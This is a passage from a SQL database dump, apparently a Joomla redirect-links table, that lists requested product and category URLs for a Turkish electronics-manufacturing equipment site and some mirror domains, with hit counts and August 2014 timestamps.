00:00:00',301),(4411,'http://www.3s-technologies.com.tr/index.php/tr/images/fancybox/fancy_shadow_se.png','','','',1,0,'2014-08-25 08:05:06','0000-00-00 00:00:00',301),(4412,'http://www.3s-technologies.com.tr/index.php/tr/images/fancybox/fancy_shadow_s.png','','','',1,0,'2014-08-25 08:05:06','0000-00-00 00:00:00',301),(4413,'http://www.3s-technologies.com.tr/index.php/tr/images/fancybox/fancy_shadow_sw.png','','','',1,0,'2014-08-25 08:05:06','0000-00-00 00:00:00',301),(4414,'http://www.3s-technologies.com.tr/index.php/tr/images/fancybox/fancy_shadow_w.png','','','',1,0,'2014-08-25 08:05:07','0000-00-00 00:00:00',301),(4415,'http://www.3s-technologies.com.tr/index.php/tr/images/fancybox/fancy_shadow_nw.png','','','',1,0,'2014-08-25 08:05:07','0000-00-00 00:00:00',301),(4416,'http://www.3s-technologies.com.tr/index.php/en//images/stories/petx.gif','','','',2,0,'2014-08-25 08:36:03','0000-00-00 00:00:00',301),(4417,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',4,0,'2014-08-25 08:49:53','0000-00-00 00:00:00',301),(4418,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',14,0,'2014-08-25 09:05:42','0000-00-00 00:00:00',301),(4419,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-25 09:10:13','0000-00-00 00:00:00',301),(4420,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default','','','',1,0,'2014-08-25 09:29:28','0000-00-00 00:00:00',301),(4421,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',1,0,'2014-08-25 09:33:56','0000-00-00 00:00:00',301),(4422,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=tr','','','',1,0,'2014-08-25 09:37:49','0000-00-00 00:00:00',301),(4423,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',2,0,'2014-08-25 09:45:15','0000-00-00 00:00:00',301),(4424,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',12,0,'2014-08-25 10:08:59','0000-00-00 00:00:00',301),(4425,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=en','','','',12,0,'2014-08-25 10:12:18','0000-00-00 00:00:00',301),(4426,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=113&lang=en','','','',12,0,'2014-08-25 10:12:29','0000-00-00 00:00:00',301),(4427,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',13,0,'2014-08-25 10:12:40','0000-00-00 00:00:00',301),(4428,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',12,0,'2014-08-25 10:12:48','0000-00-00 00:00:00',301),(4429,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=en','','','',10,0,'2014-08-25 10:13:00','0000-00-00 00:00:00',301),(4430,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',11,0,'2014-08-25 10:13:10','0000-00-00 00:00:00',301),(4431,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=113:etiket-sokucu-tidypen&catid=40:temizleme&Itemid=125&lang=en','','','',11,0,'2014-08-25 10:13:36','0000-00-00 00:00:00',301),(4432,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',12,0,'2014-08-25 10:13:45','0000-00-00 00:00:00',301),(4433,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',11,0,'2014-08-25 10:14:14','0000-00-00 00:00:00',301),(4434,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',11,0,'2014-08-25 10:14:22','0000-00-00 00:00:00',301),(4435,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=en','','','',12,0,'2014-08-25 10:14:31','0000-00-00 00:00:00',301),(4436,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',11,0,'2014-08-25 10:15:32','0000-00-00 00:00:00',301),(4437,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=en','','','',35,0,'2014-08-25 10:15:40','0000-00-00 00:00:00',301),(4438,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',42,0,'2014-08-25 10:15:53','0000-00-00 00:00:00',301),(4439,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',12,0,'2014-08-25 10:16:07','0000-00-00 00:00:00',301),(4440,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=en','','','',12,0,'2014-08-25 10:16:16','0000-00-00 00:00:00',301),(4441,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',12,0,'2014-08-25 10:16:26','0000-00-00 00:00:00',301),(4442,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',12,0,'2014-08-25 10:16:40','0000-00-00 00:00:00',301),(4443,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=en','','','',12,0,'2014-08-25 10:16:49','0000-00-00 00:00:00',301),(4444,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',12,0,'2014-08-25 10:16:56','0000-00-00 00:00:00',301),(4445,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',17,0,'2014-08-25 10:17:21','0000-00-00 00:00:00',301),(4446,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=en','','','',17,0,'2014-08-25 10:17:31','0000-00-00 00:00:00',301),(4447,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',18,0,'2014-08-25 10:17:36','0000-00-00 00:00:00',301),(4448,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=en','','','',18,0,'2014-08-25 10:17:47','0000-00-00 00:00:00',301),(4449,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',12,0,'2014-08-25 10:18:43','0000-00-00 00:00:00',301),(4450,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=154&Itemid=156&lang=en','','','',21,0,'2014-08-25 10:18:53','0000-00-00 00:00:00',301),(4451,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',12,0,'2014-08-25 10:19:12','0000-00-00 00:00:00',301),(4452,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=en','','','',13,0,'2014-08-25 10:19:31','0000-00-00 00:00:00',301),(4453,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=157&lang=en','','','',13,0,'2014-08-25 10:19:55','0000-00-00 00:00:00',301),(4454,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',13,0,'2014-08-25 10:20:06','0000-00-00 00:00:00',301),(4455,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',12,0,'2014-08-25 10:20:13','0000-00-00 00:00:00',301),(4456,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=en','','','',13,0,'2014-08-25 10:20:19','0000-00-00 00:00:00',301),(4457,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',13,0,'2014-08-25 10:20:39','0000-00-00 00:00:00',301),(4458,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',12,0,'2014-08-25 10:20:45','0000-00-00 00:00:00',301),(4459,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',12,0,'2014-08-25 10:20:52','0000-00-00 00:00:00',301),(4460,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',13,0,'2014-08-25 10:21:06','0000-00-00 00:00:00',301),(4461,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',12,0,'2014-08-25 10:21:12','0000-00-00 00:00:00',301),(4462,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=en','','','',12,0,'2014-08-25 10:21:23','0000-00-00 00:00:00',301),(4463,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=en','','','',12,0,'2014-08-25 10:22:00','0000-00-00 00:00:00',301),(4464,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',12,0,'2014-08-25 10:22:05','0000-00-00 00:00:00',301),(4465,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',12,0,'2014-08-25 10:22:21','0000-00-00 00:00:00',301),(4466,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',13,0,'2014-08-25 10:24:55','0000-00-00 00:00:00',301),(4467,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',5,0,'2014-08-25 10:26:35','0000-00-00 00:00:00',301),(4468,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',5,0,'2014-08-25 10:27:18','0000-00-00 00:00:00',301),(4469,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',5,0,'2014-08-25 10:27:27','0000-00-00 00:00:00',301),(4470,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',21,0,'2014-08-25 10:27:35','0000-00-00 00:00:00',301),(4471,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',19,0,'2014-08-25 10:27:43','0000-00-00 00:00:00',301),(4472,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',5,0,'2014-08-25 10:27:52','0000-00-00 00:00:00',301),(4473,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',6,0,'2014-08-25 10:27:59','0000-00-00 00:00:00',301),(4474,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',6,0,'2014-08-25 10:28:18','0000-00-00 00:00:00',301),(4475,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',6,0,'2014-08-25 10:28:25','0000-00-00 00:00:00',301),(4476,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',6,0,'2014-08-25 10:28:40','0000-00-00 00:00:00',301),(4477,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',6,0,'2014-08-25 10:28:55','0000-00-00 00:00:00',301),(4478,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=43:ultra-hizli&Itemid=2&layout=default&lang=en','','','',5,0,'2014-08-25 10:29:48','0000-00-00 00:00:00',301),(4479,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',6,0,'2014-08-25 10:29:50','0000-00-00 00:00:00',301),(4480,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',6,0,'2014-08-25 10:30:00','0000-00-00 00:00:00',301),(4481,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-25 10:30:05','0000-00-00 00:00:00',301),(4482,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',6,0,'2014-08-25 10:30:15','0000-00-00 00:00:00',301),(4483,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=en','','','',6,0,'2014-08-25 10:30:26','0000-00-00 00:00:00',301),(4484,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',6,0,'2014-08-25 10:30:38','0000-00-00 00:00:00',301),(4485,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=55:katalog&Itemid=1&layout=default&lang=en','','','',6,0,'2014-08-25 10:31:05','0000-00-00 00:00:00',301),(4486,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',6,0,'2014-08-25 10:31:20','0000-00-00 00:00:00',301),(4487,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',6,0,'2014-08-25 10:31:30','0000-00-00 00:00:00',301),(4488,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=en','','','',6,0,'2014-08-25 10:31:48','0000-00-00 00:00:00',301),(4489,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',6,0,'2014-08-25 10:32:32','0000-00-00 00:00:00',301),(4490,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',9,0,'2014-08-25 10:35:05','0000-00-00 00:00:00',301),(4491,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&amp','','','',6,0,'2014-08-25 10:35:52','0000-00-00 00:00:00',301),(4492,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=en&limitstart=5','','','',1,0,'2014-08-25 10:42:15','0000-00-00 00:00:00',301),(4493,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=112&Itemid=123&lang=en','','','',1,0,'2014-08-25 11:20:11','0000-00-00 00:00:00',301),(4494,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=145&Itemid=147&lang=tr','','','',1,0,'2014-08-25 11:31:16','0000-00-00 00:00:00',301),(4495,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-08-25 11:44:40','0000-00-00 00:00:00',301),(4496,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',9,0,'2014-08-25 12:13:29','0000-00-00 00:00:00',301),(4497,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159','','','',2,0,'2014-08-25 12:18:29','0000-00-00 00:00:00',301),(4498,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=122&Itemid=129&lang=tr','','','',11,0,'2014-08-25 12:23:29','0000-00-00 00:00:00',301),(4499,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=54&Itemid=&lang=tr','','','',1,0,'2014-08-25 12:31:30','0000-00-00 00:00:00',301),(4500,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=tr','','','',2,0,'2014-08-25 12:35:12','0000-00-00 00:00:00',301),(4501,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-25 13:14:25','0000-00-00 00:00:00',301),(4502,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-25 13:24:26','0000-00-00 00:00:00',301),(4503,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151&Itemid=152&lang=tr','','','',5,0,'2014-08-25 13:58:04','0000-00-00 00:00:00',301),(4504,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',2,0,'2014-08-25 14:06:23','0000-00-00 00:00:00',301),(4505,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-08-25 15:02:20','0000-00-00 00:00:00',301),(4506,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',9,0,'2014-08-25 15:15:51','0000-00-00 00:00:00',301),(4507,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108','','','',1,0,'2014-08-25 16:01:03','0000-00-00 00:00:00',301),(4508,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=&lang=en','','','',1,0,'2014-08-25 16:03:44','0000-00-00 00:00:00',301),(4509,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127','','','',2,0,'2014-08-25 16:20:50','0000-00-00 00:00:00',301),(4510,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',10,0,'2014-08-25 16:23:29','0000-00-00 00:00:00',301),(4511,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=116&lang=en','','','',5,0,'2014-08-25 17:17:14','0000-00-00 00:00:00',301),(4512,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',4,0,'2014-08-25 17:55:47','0000-00-00 00:00:00',301),(4513,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141&Itemid=143&lang=tr','','','',1,0,'2014-08-25 18:33:25','0000-00-00 00:00:00',301),(4514,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',2,0,'2014-08-25 19:33:57','0000-00-00 00:00:00',301),(4515,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',1,0,'2014-08-25 19:37:21','0000-00-00 00:00:00',301),(4516,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',1,0,'2014-08-25 19:43:57','0000-00-00 00:00:00',301),(4517,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=tr','','','',1,0,'2014-08-25 19:44:00','0000-00-00 00:00:00',301),(4518,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',1,0,'2014-08-25 19:44:03','0000-00-00 00:00:00',301),(4519,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-08-25 20:14:47','0000-00-00 00:00:00',301),(4520,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/welcome.html','','','',11,0,'2014-08-25 20:21:24','0000-00-00 00:00:00',301),(4521,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=tr','','','',8,0,'2014-08-25 20:27:10','0000-00-00 00:00:00',301),(4522,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=0&lang=en','','','',1,0,'2014-08-25 20:27:18','0000-00-00 00:00:00',301),(4523,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',7,0,'2014-08-25 20:35:07','0000-00-00 00:00:00',301),(4524,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=0&lang=tr','','','',6,0,'2014-08-25 21:20:07','0000-00-00 00:00:00',301),(4525,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=tr','','','',6,0,'2014-08-25 22:14:03','0000-00-00 00:00:00',301),(4526,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=&lang=en','','','',1,0,'2014-08-25 22:24:24','0000-00-00 00:00:00',301),(4527,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',11,0,'2014-08-25 22:38:54','0000-00-00 00:00:00',301),(4528,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160','','','',1,0,'2014-08-25 23:06:18','0000-00-00 00:00:00',301),(4529,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160','','','',1,0,'2014-08-25 23:10:33','0000-00-00 00:00:00',301),(4530,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=&lang=tr','','','',1,0,'2014-08-25 23:32:05','0000-00-00 00:00:00',301),(4531,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=0&lang=tr','','','',1,0,'2014-08-25 23:44:16','0000-00-00 00:00:00',301),(4532,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=&lang=tr','','','',1,0,'2014-08-25 23:51:38','0000-00-00 00:00:00',301),(4533,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-08-26 00:37:33','0000-00-00 00:00:00',301),(4534,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71&Itemid=79&lang=tr','','','',2,0,'2014-08-26 01:00:22','0000-00-00 00:00:00',301),(4535,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=&lang=tr','','','',1,0,'2014-08-26 01:05:59','0000-00-00 00:00:00',301),(4536,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=54&Itemid=&lang=en','','','',1,0,'2014-08-26 01:40:05','0000-00-00 00:00:00',301),(4537,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43','','','',4,0,'2014-08-26 01:47:36','0000-00-00 00:00:00',301),(4538,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=tr','','','',2,0,'2014-08-26 02:19:23','0000-00-00 00:00:00',301),(4539,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=0&lang=en','','','',2,0,'2014-08-26 02:19:42','0000-00-00 00:00:00',301),(4540,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=en','','','',1,0,'2014-08-26 05:38:02','0000-00-00 00:00:00',301),(4541,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-08-26 06:33:19','0000-00-00 00:00:00',301),(4542,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=0&lang=en','','','',1,0,'2014-08-26 06:36:51','0000-00-00 00:00:00',301),(4543,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',1,0,'2014-08-26 06:59:28','0000-00-00 00:00:00',301),(4544,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',5,0,'2014-08-26 07:23:41','0000-00-00 00:00:00',301),(4545,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',5,0,'2014-08-26 07:29:28','0000-00-00 00:00:00',301),(4546,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=93&Itemid=104&lang=tr','','','',6,0,'2014-08-26 07:36:04','0000-00-00 00:00:00',301),(4547,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',2,0,'2014-08-26 08:46:05','0000-00-00 00:00:00',301),(4548,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=&lang=en','','','',1,0,'2014-08-26 09:57:38','0000-00-00 00:00:00',301),(4549,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-26 10:14:51','0000-00-00 00:00:00',301),(4550,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=&lang=en','','','',1,0,'2014-08-26 10:31:41','0000-00-00 00:00:00',301),(4551,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',5,0,'2014-08-26 10:41:13','0000-00-00 00:00:00',301),(4552,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',5,0,'2014-08-26 10:42:40','0000-00-00 00:00:00',301),(4553,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-26 